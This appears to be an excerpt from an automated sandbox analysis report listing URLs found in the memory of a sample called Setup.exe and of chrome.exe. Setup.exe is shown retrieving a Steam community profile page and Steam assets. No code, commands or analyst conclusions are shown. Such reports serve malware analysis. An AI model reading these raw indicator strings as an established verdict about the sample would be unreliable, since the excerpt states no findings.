Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: chrome.exe, 00000002.00000003.1935679655.00006204002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952700993.0000620403134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953393315.00006204030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2950780851.00006204030B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953155697.00006204030D8000.00000004.00000800.00020000.00000000.sdmp, chromecache_73.6.dr, chromecache_76.6.dr	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000002.00000002.2950905402.0000620403178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941352140.0000620400634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942158575.0000620400744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes
Source: Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945845923.0000620400F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942239090.0000620400760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000002.00000002.2944117568.0000620400BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: chrome.exe, 00000002.00000002.2944153810.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1913651793.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000002.00000002.2944153810.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1913651793.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000002.00000002.2944049425.0000620400B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000002.00000002.2944049425.0000620400B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000002.00000002.2944049425.0000620400B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: chrome.exe, 00000002.00000003.1915166528.0000620400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2938241363.000062040003C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1920939536.0000620400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1908096372.0000620400490000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918800969.0000620400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941388279.0000620400650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944049425.0000620400B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941934704.0000620400700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2946539920.0000620401140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943472168.00006204009E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944380606.0000620400C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enb
Source: chrome.exe, 00000002.00000003.1915166528.0000620400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1920939536.0000620400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918800969.0000620400ED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000002.00000003.1904765932.0000298C006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2937240973.0000298C00798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000002.00000003.1904473138.0000298C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904165756.0000298C00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1946368926.000062040280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000002.00000003.1904765932.0000298C006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2937240973.0000298C00798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000002.00000003.1904473138.0000298C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904165756.0000298C00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1946368926.000062040280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000002.00000003.1904706618.0000298C00690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2937240973.0000298C00798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000002.00000003.1904473138.0000298C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904165756.0000298C00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1946368926.000062040280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000002.00000002.2938241363.000062040003C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/g1
Source: chrome.exe, 00000002.00000003.1900428097.00001D68002E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1900413969.00001D68002DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000002.00000002.2941478828.0000620400678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941616164.00006204006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2938241363.000062040003C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1913651793.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1908096372.0000620400490000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941388279.0000620400650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000002.00000003.1913651793.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.
Source: Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/countryflags/us.gif
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1858083111.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: Setup.exe, 00000000.00000003.1834135161.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: chrome.exe, 00000002.00000002.2941352140.0000620400634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2949502077.000062040272E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2950031052.0000620402BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1
Source: chrome.exe, 00000002.00000002.2942331653.00006204007A7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939055307.000062040018C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941616164.00006204006BF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939692696.0000620400304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/download-dt/1
Source: chrome.exe, 00000002.00000002.2943173111.0000620400948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942331653.00006204007A7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941616164.00006204006BF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939692696.0000620400304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/download-dt/1Content-Security-Policy:
Source: chrome.exe, 00000002.00000002.2943173111.0000620400948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942331653.00006204007A7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941616164.00006204006BF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939692696.0000620400304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/download-dt/1Content-Type:
Source: chrome.exe, 00000002.00000002.2942331653.00006204007A7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941616164.00006204006BF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939692696.0000620400304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/download-dt/1d
Source: chrome.exe, 00000002.00000003.1944635588.0000620402760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939055307.000062040018C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/web
Source: chrome.exe, 00000002.00000003.1944635588.0000620402760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/webCross-Origin-Opener-Policy:
Source: chrome.exe, 00000002.00000003.1944635588.0000620402760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/webrj
Source: chrome.exe, 00000002.00000002.2943795779.0000620400AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: chrome.exe, 00000002.00000003.1944635588.0000620402760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/web
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00MGQ5LTgyNjA
